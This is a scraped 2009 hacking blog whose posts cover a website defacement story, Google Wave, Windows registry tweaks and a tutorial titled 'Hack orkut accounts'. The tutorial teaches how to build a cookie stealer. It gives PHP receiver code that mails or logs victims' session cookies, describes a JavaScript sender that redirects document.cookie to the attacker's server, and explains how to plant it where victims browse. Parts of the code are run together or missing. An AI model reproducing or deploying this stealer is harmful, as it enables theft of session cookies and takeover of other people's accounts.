Thursday, December 24, 2009


A typical example to bypass orkut/gmail's ssl security:

Saturday, December 12, 2009

Ankit Fadia Website Hacked : Complete Story

New Delhi- Ankit Fadia, an internationally renowned hacker, seems to get trapped in the same net he was using so far to cage other. Recently his website http is hacked and being uplifted by some Viagra's D b_Ankit180.
Ankit Fadia, a famous computer security consultant has authored several internationally best-selling books on Computer Security. At the age of 14 , Ankit Fadia hacked the front page of an Indian magazine and sent an e-mail to the editor confessing to the hack and suggesting counter measures, BBC reported.
He wrote a book on "ethical hacking" at the age of 15, becoming the youngest ever author to be published by Macmillan India.
The computer security guru also train people on computer security. For this, you have to undergo AFCEH or "Ankit Fadia Certified Ethical Hacker" course. This certification program helps IT security professionals protect internet enabled computer security systems against cyber security threats and hacking.
Now, Ankit Fadia's hacked website is showing link of some website named http and some other links also. These are all related to advertising and promoting viagra online. The thing notable is that its Google cache is at least back from 11 28 09 date which means it would have defaced very recently.
The hacker has not being detected yet. Ankit Fadia has been informed about the matter, lets see what he has to say. He may receive an e-mail from the hacker suggesting him more preventive measures to stop being hacked next time.

Saturday, December 5, 2009

Google Wave

Google Wave is an online tool for real-time communication and collaboration. A wave can be both a conversation and a document where people can discuss and work together using richly formatted text,photos, videos, maps, and more.

To request an invitation to Google Wave, go to following link:

Monday, October 5, 2009

Hack orkut accounts

Exactly how does a cookie stealer work, anyway? There are two components in a cookie stealer: the sender and the receiver.
The sender can take many forms. In essense, it's just a link to the receiver with the cookie somehow attached. It can sometimes be difficult to find a way to implement the sender.
The receiver, as the name suggests, is a device which receives the cookie from the sender. It can also take several forms, but the most common is that of a PHP document, most commonly found residing on some obscure webserver.
Step One: The Code
Coding a receiver is the part with which most newbies struggle. Only two things are needed to make a receiver: a webhost which supports PHP, and Notepad (see the end of the text for a link to some free PHP hosts).
As I said in the introduction, the receiver's job is to receive the cookie from the sender. The easiest way to send information to a PHP document is by using the HTTP GET method, which appends information to the end of the URL as a parameter (for example, "page.php?arg1=value"). PHP can access GET information by accessing $HTTP_GET_VARS[x], where x is a string containing the name of the argument.
Once the receiver has the cookie, it needs a way to get that cookie to you. The two most common ways of doing this are sending it in an email, and storing it in a log. We'll look at both.
First, let's look at sending it in an email. Here is what such a beast would look like (functioning code):
$cookie = $HTTP_GET_VARS["cookie"]; // line 2mail("", "Cookie stealer report", $cookie); // line 3?> // line 4
Line 1 tells the server that this is indeed a PHP document.Line 2 takes the cookie from the URL ("stealer.php?cookie=x") and stores it in the variable $cookie.Line 3 accesses PHP's mail() function and sends the cookie to "" with the subject of "Cookie stealer report".Line 4 tells the server that the PHP code ends here.
Next, we'll look at my preferred method, which is storing the cookie in a logfile. (functioning code)
$cookie = $HTTP_GET_VARS["cookie"]; // line 2$file = fopen('cookielog.txt', 'a'); // line 3fwrite($file, $cookie . "\n\n"); // line 4?> // line 5
Lines 1 and 2 are the same as before.Line 3 opens the file "cookielog.txt" for writing, then stores the file's handle in $file.Line 4 writes the cookie to the file which has its handle in $file. The period between $cookie and "\n\n" combines the two strings as one. The "\n\n" acts as a double line-break, making it easier for us to sift through the log file.Line 5 is the same as before.
Step Two: Implementing the Stealer
The hardest part (usually) of making a cookie stealer is finding a way to use the sender. The simplest method requires use of HTML and JavaScript, so you have to be sure that your environment supports those two. Here is an example of a sender.
// Line 3
Line 1 tells the browser that the following chunk of code is to be interpereted as JavaScript.Line 2 adds document.cookie to the end of the URL, which is then stored in document.location. Whenever document.location is changed, the browser is redirected to that URL.Line 3 tells the browser to stop reading the code as JavaScript (return to HTML).
There are two main ways of implementing the sender:
You can plant your sender where the victim will view it as an HTML document with his browser. In order to do that, you have to find some way to actually post the code somewhere on the site

Make win xp shutdown faster

1. This step is very important.Export (right click > Export) the following keys and save it to a safer place.
HKEY CURRENT USER\Control Panel\DesktopHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
2. Open Notepad, copy and paste the following to the Notepad.
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Control Panel\Desktop]"AutoEndTasks"="1""HungAppTimeout"="1000""WaitToKillAppTimeout"="2000"
3. Save the file and close Notepad.
4. Change extension of the file from .txt (text file) to .reg (registry file).
5. Double click open this file and click Yes and the OK .

Access Device Manager by a single click FROM My Computer

By doing this trick, you can access the Device Manager by a single click from the right click menu of My Computer.
1. Open Notepad.

2. Copy the following text to Notepad. (or download the registry file)
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Device Manager\command]@="mmc.exe %%systemroot%%\\\\System32\\\\devmgmt.msc"

3. Save the text file.4. Change extension from .txt (text file) to .reg (registry file).5. Double click open the file, click Yes and then click OK.
Its done.